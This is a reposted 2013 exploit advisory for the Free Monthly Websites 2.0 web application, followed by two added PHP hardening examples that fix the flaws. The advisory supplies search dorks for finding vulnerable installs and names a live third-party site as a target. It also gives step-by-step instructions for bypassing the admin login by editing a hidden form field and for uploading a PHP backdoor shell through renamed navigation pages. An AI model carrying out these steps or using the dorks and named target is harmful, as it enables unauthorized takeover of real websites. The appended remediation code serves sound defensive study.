Praetorian503
Posted February 5, 2013

Free Monthly Websites version 2.0 suffers from administrative login bypass and remote shell upload vulnerabilities.

==========================================================================================
 Free Monthly Websites 2.0 Multiple Vulnerabilities
==========================================================================================

:----------------------------------------------------------------------------------------:
: # Exploit Title : Free Monthly Websites 2.0 Multiple Vulnerabilities
: # Date : 04 February 2013
: # Author : X-Cisadane
: # Vendor : http://www.freemonthlywebsites2.com/
: # Download : http://www.freemonthlywebsites2.com/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip
: # Version : 2.0
: # Category : Web Applications
: # Vulnerability : Admin Login Bypass and Shell Upload Vulnerability
: # Tested On : Google Chrome 24.0.1312.52 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas
:----------------------------------------------------------------------------------------:

DORKS
=====
inurl:/index_ebay.php
"Powered by: Resell Rights Fortune"
"Generating Traffic to Your Site with Keyword Based Articles"
Powered By: Free Monthly Websites 2.0

Proof of Concept
================

[ 1 ] Admin Login Bypass

Vulnerable page http://target.com/[path]/admin/index.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16     $filename="settings/admin_settings.txt";
17
18     if(!$handle = fopen($filename, 'r'))
19     {
20         echo "Cannot open file ($filename)";
21         exit;
22     }
23     $contents = fread($handle, filesize($filename));
24     fclose($handle);
25     $argument_arr=explode("#_1_#",$contents);
26
27     if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28     {
29         $_SESSION[logged_in]=true;
30         header("location:welcome.php");

Based on line 16 we know that the Admin Username and Password are stored in admin_settings.txt, NOT in the Database! So when we log in to the Admin Panel, file_io.php will read the valid Username and Password from admin_settings.txt.
If you do a direct access to the file admin_settings.txt, the result is 403 Permission Denied:
You do not have permission for this request /admin/settings/admin_settings.txt
Pic : http://i48.tinypic.com/2gvlwt4.png

So... How to Bypass Admin Login Page?

1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php
Live Target : http://www.massmoneywebsites.com/admin/

2nd. Inspect Element on the login Form.
Pic : http://i47.tinypic.com/2r5ddp1.png

3rd. Change from
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">
CHANGE TO
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic : http://i49.tinypic.com/351z3ib.png

4th. You will see a Login Failed Page : >> You need to login in to access that page <<
Pic : http://i50.tinypic.com/33ws8jb.png
Never mind about that, just click 'Login Button' and VOILA, you get Admin Access!
Pic : http://i45.tinypic.com/jzwpea.png

----------------------------------------

[ 2 ] Upload PHP Backdoor or PHP Shell

This vulnerability works on the PREMIUM VERSION of Free Monthly Websites 2.0.

So... How to Upload Backdoor (PHP Shell)?

1st. Go to Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php
Live Target : http://www.massmoneywebsites.com/admin/add_main_pages.php

2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
And click Add New Navigation Page.
Pic : http://i45.tinypic.com/vigzsp.png

3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.
Pic : http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php then click Sort Navigation Pages.
Pic : http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.

5th. Inspect element on dwi.php.html
Pic : http://i50.tinypic.com/29pq1ix.png
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
To <option value="dwi.php" selected="">dwi.php</option>
Pic : http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Pic : http://i46.tinypic.com/1zebnle.png

7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:
Click the SOURCE button.
Press Enter twice at the first line, then paste your PHP Backdoor/PHP Shell below.
And press Enter twice at the last line.
*Please see the 2 pictures below if you don't understand.
Pic 1 : http://i49.tinypic.com/1zlzxq0.png
Pic 2 : http://i48.tinypic.com/291kc9h.png
If you wanna do this, please remove your Backdoor Password.
Click Save Edited Navigation Page.

8th. After this message >> Data saved successfully << appears, visit the Home Page and you will see the Backdoor Page.
Pic : http://i49.tinypic.com/4rt1g4.png

//I'm sorry My English was poor

Source: PacketStorm
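A hardened shape for the `file_io.php` dispatcher excerpted in the post, as an added example (not code from the original post or from the vendor). The write branch is not shown in the post, so this assumes `admin_settings_write` ran without checking `$_SESSION['logged_in']`; the `fmw_deny` helper and the hashed-password storage format are hypothetical.

```php
<?php
// Added example, not vendor code. Assumption: every do_type other than the
// login check must only run for an already authenticated session.
declare(strict_types=1);
session_start();

const SETTINGS_FILE  = __DIR__ . '/settings/admin_settings.txt'; // path from the excerpt
const PUBLIC_ACTIONS = ['admin_settings_read'];   // credential check only
const ADMIN_ACTIONS  = ['admin_settings_write'];  // requires a session

function fmw_deny(int $code, string $msg): void   // hypothetical helper
{
    http_response_code($code);
    exit($msg);
}

// Read the action from POST only; $_REQUEST also accepts GET and cookies.
$action = $_POST['do_type'] ?? '';
if (!is_string($action)
    || !in_array($action, array_merge(PUBLIC_ACTIONS, ADMIN_ACTIONS), true)) {
    fmw_deny(400, 'Unknown action');
}

// The hidden form field is client-controlled, so authorisation is decided
// here, from server-side session state, before any branch runs.
if (in_array($action, ADMIN_ACTIONS, true) && empty($_SESSION['logged_in'])) {
    fmw_deny(403, 'Login required');
}

if ($action === 'admin_settings_read') {
    $contents = file_get_contents(SETTINGS_FILE);
    if ($contents === false) {
        fmw_deny(500, 'Cannot read settings');
    }
    // Assumed storage: username#_1_#hash, with the hash from password_hash().
    $parts = explode('#_1_#', trim($contents));
    $user  = $_POST['username'] ?? '';
    $pass  = $_POST['pass'] ?? '';
    $ok = count($parts) >= 2 && is_string($user) && is_string($pass)
        && hash_equals($parts[0], $user)
        && password_verify($pass, $parts[1]);
    if (!$ok) {
        fmw_deny(403, 'Login failed');
    }
    session_regenerate_id(true);   // new session id on privilege change
    $_SESSION['logged_in'] = true;
    header('Location: welcome.php');
    exit;
}
// admin_settings_write continues here, reachable only with a valid session.
```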
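For the second issue, where page names arrive from an editable `<option>` value and the sort field, a server-side check of the file name closes the gap. This is an added example, not vendor code: `fmw_safe_page_path`, `fmw_new_page_name` and the `main_pages/` layout are assumptions taken from the "URL For This Page" value in the post, and the sample names are constructed.

```php
<?php
// Added example, not vendor code. Function names and directory layout are
// assumptions; the sample values at the bottom are constructed.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/main_pages';

/**
 * Map a page name submitted by the browser (form field, <option> value,
 * sort list entry) to a file the editor may write, or throw.
 */
function fmw_safe_page_path(string $submitted, array $knownPages): string
{
    // Only names the server itself created are accepted, so an edited
    // <option value="..."> cannot introduce a new file name.
    if (!in_array($submitted, $knownPages, true)) {
        throw new InvalidArgumentException('Unknown page');
    }
    // No directory parts, a conservative character set, a fixed extension.
    if ($submitted !== basename($submitted)
        || !preg_match('/\A[A-Za-z0-9_.-]{1,64}\.html\z/', $submitted)) {
        throw new InvalidArgumentException('Invalid page name');
    }
    return PAGES_DIR . '/' . $submitted;
}

/** Name for a newly added page: dots are replaced and .html is appended here. */
function fmw_new_page_name(string $title): string
{
    $stem = trim((string) preg_replace('/[^A-Za-z0-9_-]+/', '-', $title), '-');
    if ($stem === '') {
        throw new InvalidArgumentException('Empty page name');
    }
    return $stem . '.html';
}

// Constructed sample input: the page name and the two edited values from the post.
$known = [fmw_new_page_name('dwi.php')];
foreach ([$known[0], 'dwi.php', '/dwi.php'] as $candidate) {
    try {
        echo $candidate, ' -> ', fmw_safe_page_path($candidate, $known), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $candidate, ' -> rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Serving `main_pages/` with script execution disabled in the web server configuration is a second layer that holds even if a name check is missed.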